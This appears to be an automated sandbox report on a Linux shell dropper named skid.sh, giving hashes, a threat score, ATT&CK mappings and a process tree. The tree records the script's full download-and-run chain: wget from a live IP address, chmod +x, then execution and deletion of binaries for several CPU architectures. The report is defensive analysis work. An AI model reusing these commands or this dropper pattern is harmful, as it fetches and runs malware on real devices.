32e82081fe66e5f77000ecc3fde85384723a93ab7b242f39de6621d5959d38bf

Analysis

max time kernel
149s
max time network
160s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
26/02/2025, 16:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

skid.sh
Size

1KB
MD5

b748ad8311eb181303f9c59d1efd764f
SHA1

e3da904334e7ed388ef2ccca048c7a0e50e4332b
SHA256

32e82081fe66e5f77000ecc3fde85384723a93ab7b242f39de6621d5959d38bf
SHA512

b34853c0dac00b278c10e3019751634603099ce87125824a278e90d978560449ffc34c6af404134928be3d413979934d61aa5003fe1f826f980c2908449c7da5

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 8 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
733	chmod
752	chmod
758	chmod
670	chmod
680	chmod
688	chmod
703	chmod
718	chmod

Reads system routing table 1 TTPs 3 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	skid.arm5
File opened for reading	/proc/net/route	skid.arm6
File opened for reading	/proc/net/route	skid.arm4

Reads system network configuration 1 TTPs 3 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	skid.arm4
File opened for reading	/proc/net/route	skid.arm5
File opened for reading	/proc/net/route	skid.arm6

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
648	wget
672	skid.mips
675	rm

Writes file to tmp directory 8 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/skid.arm6	wget
File opened for modification	/tmp/skid.mips	wget
File opened for modification	/tmp/skid.mpsl	wget
File opened for modification	/tmp/skid.x86	wget
File opened for modification	/tmp/skid.ppc	wget
File opened for modification	/tmp/skid.sparc	wget
File opened for modification	/tmp/skid.arm4	wget
File opened for modification	/tmp/skid.arm5	wget

/tmp/skid.sh
/tmp/skid.sh
1⤵
PID:646
- /usr/bin/wget
  wget http://185.224.0.18/skid.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:648
- /bin/chmod
  chmod +x skid.mips
  2⤵
  - File and Directory Permissions Modification
  PID:670
- /tmp/skid.mips
  ./skid.mips
  2⤵
  - System Network Configuration Discovery
  PID:672
- /bin/rm
  rm -rf skid.mips
  2⤵
  - System Network Configuration Discovery
  PID:675
- /usr/bin/wget
  wget http://185.224.0.18/skid.mpsl
  2⤵
  - Writes file to tmp directory
  PID:676
- /bin/chmod
  chmod +x skid.mpsl
  2⤵
  - File and Directory Permissions Modification
  PID:680
- /tmp/skid.mpsl
  ./skid.mpsl
  2⤵
  PID:681
- /bin/rm
  rm -rf skid.mpsl
  2⤵
  PID:683
- /usr/bin/wget
  wget http://185.224.0.18/skid.x86
  2⤵
  - Writes file to tmp directory
  PID:685
- /bin/chmod
  chmod +x skid.x86
  2⤵
  - File and Directory Permissions Modification
  PID:688
- /tmp/skid.x86
  ./skid.x86
  2⤵
  PID:690
- /bin/rm
  rm -rf skid.x86
  2⤵
  PID:692
- /usr/bin/wget
  wget http://185.224.0.18/skid.ppc
  2⤵
  - Writes file to tmp directory
  PID:694
- /bin/chmod
  chmod +x skid.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:703
- /tmp/skid.ppc
  ./skid.ppc
  2⤵
  PID:704
- /bin/rm
  rm -rf skid.ppc
  2⤵
  PID:706
- /usr/bin/wget
  wget http://185.224.0.18/skid.sparc
  2⤵
  - Writes file to tmp directory
  PID:708
- /bin/chmod
  chmod +x skid.sparc
  2⤵
  - File and Directory Permissions Modification
  PID:718
- /tmp/skid.sparc
  ./skid.sparc
  2⤵
  PID:719
- /bin/rm
  rm -rf skid.sparc
  2⤵
  PID:722
- /usr/bin/wget
  wget http://185.224.0.18/skid.arm4
  2⤵
  - Writes file to tmp directory
  PID:724
- /bin/chmod
  chmod +x skid.arm4
  2⤵
  - File and Directory Permissions Modification
  PID:733
- /tmp/skid.arm4
  ./skid.arm4
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:735
- /bin/rm
  rm -rf skid.arm4
  2⤵
  PID:738
- /usr/bin/wget
  wget http://185.224.0.18/skid.arm5
  2⤵
  - Writes file to tmp directory
  PID:741
- /bin/chmod
  chmod +x skid.arm5
  2⤵
  - File and Directory Permissions Modification
  PID:752
- /tmp/skid.arm5
  ./skid.arm5
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:753
- /bin/rm
  rm -rf skid.arm5
  2⤵
  PID:756
- /usr/bin/wget
  wget http://185.224.0.18/skid.arm6
  2⤵
  - Writes file to tmp directory
  PID:757
- /bin/chmod
  chmod +x skid.arm6
  2⤵
  - File and Directory Permissions Modification
  PID:758
- /tmp/skid.arm6
  ./skid.arm6
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:759
- /bin/rm
  rm -rf skid.arm6
  2⤵
  PID:762

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads